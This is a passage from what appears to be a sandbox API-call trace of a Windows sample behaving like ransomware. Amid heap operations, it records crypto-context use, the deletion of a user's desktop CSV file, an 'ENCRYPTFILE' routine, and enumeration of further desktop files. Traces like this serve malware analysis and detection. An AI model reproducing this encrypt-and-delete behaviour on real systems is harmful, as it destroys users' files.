lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0126.317] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0126.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0126.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0126.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0126.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0126.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0126.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0126.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0126.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0126.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0126.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0126.318] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0126.318] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0126.318] FreeLibrary (hLibModule=0x756e0000) returned 1 [0126.318] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0126.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0126.319] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0126.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0126.319] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0126.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0126.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0126.319] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0126.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0126.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0126.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0126.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0126.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0126.319] CloseHandle (hObject=0x258) returned 1 [0126.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0126.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0126.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb450 | out: hHeap=0x1780000) returned 1 [0126.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0126.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0126.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0126.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0126.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0126.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0126.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0126.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0126.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0126.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0126.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0126.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0126.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0126.319] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0126.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0126.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0126.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0126.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0126.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0126.320] CloseHandle (hObject=0x2a0) returned 1 [0126.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0126.322] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0126.323] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uaY41mSq.csv", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\uaY41mSq.csv", lpFilePart=0x0) returned 0x24 [0126.323] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uaY41mSq.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\uay41msq.csv")) returned 0x20 [0126.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0126.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0126.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0126.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0126.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0126.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0126.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0126.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0126.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0126.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0126.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369c10 [0126.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392490 [0126.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43924c8 [0126.323] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uaY41mSq.csv", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f9f2890, ftCreationTime.dwHighDateTime=0x1d5e26a, ftLastAccessTime.dwLowDateTime=0x2521ef00, ftLastAccessTime.dwHighDateTime=0x1d5ea03, ftLastWriteTime.dwLowDateTime=0x2521ef00, ftLastWriteTime.dwHighDateTime=0x1d5ea03, nFileSizeHigh=0x0, nFileSizeLow=0x11885, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="uaY41mSq.csv", cAlternateFileName="")) returned 0x41ac280 [0126.323] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uaY41mSq.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\uay41msq.csv")) returned 1 [0126.376] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f9f2890, ftCreationTime.dwHighDateTime=0x1d5e26a, ftLastAccessTime.dwLowDateTime=0x2521ef00, ftLastAccessTime.dwHighDateTime=0x1d5ea03, ftLastWriteTime.dwLowDateTime=0x2521ef00, ftLastWriteTime.dwHighDateTime=0x1d5ea03, nFileSizeHigh=0x0, nFileSizeLow=0x11885, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="uaY41mSq.csv", cAlternateFileName="")) returned 0 [0126.377] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0126.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0126.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0126.377] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0126.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0126.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21c0 [0126.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0126.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0126.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0126.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0126.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0126.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0126.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0126.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0126.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0126.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0126.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0126.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b22250 [0126.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9950 [0126.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0126.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0126.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0126.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0126.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0126.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0126.378] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0126.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0126.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0126.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0126.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0126.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0126.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0126.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0126.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0126.378] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\V_VfUPg6JY sjdteIA3.gif", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x700cfec0, ftCreationTime.dwHighDateTime=0x1d5ef11, ftLastAccessTime.dwLowDateTime=0xb0963b40, ftLastAccessTime.dwHighDateTime=0x1d5f016, ftLastWriteTime.dwLowDateTime=0xb0963b40, ftLastWriteTime.dwHighDateTime=0x1d5f016, nFileSizeHigh=0x0, nFileSizeLow=0xa4a, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="V_VfUPg6JY sjdteIA3.gif", cAlternateFileName="V_VFUP~1.GIF")) returned 0x41ac700 [0126.378] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0126.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0126.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0126.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0126.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920d8 [0126.379] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0126.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0126.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2180 [0126.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0126.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0126.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0126.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0126.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9cc8 [0126.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0126.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0126.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0126.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0126.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0126.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0126.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0126.379] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0126.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0126.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0126.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0126.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0126.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0126.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0126.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0126.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921f0 [0126.380] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0126.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0126.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21f0 [0126.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0126.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0126.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0126.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0126.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2320 [0126.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0126.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0126.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2130 [0126.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0126.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0126.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c80 [0126.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0126.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0126.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0126.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0126.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0126.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0126.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0126.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0126.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0126.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0126.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0126.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0126.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0126.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0126.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0126.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0126.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0126.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0126.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0126.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0126.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0126.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0126.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0126.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0126.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920d8 [0126.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0126.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0126.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0126.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0126.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0126.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0126.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0126.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0126.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0126.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0126.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0126.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0126.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0126.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0126.382] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0126.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0126.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0126.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0126.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0126.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0126.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0126.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0126.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0126.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0126.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0126.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0126.382] RtlAllocateHeap (HeapHandle=0x1780000, 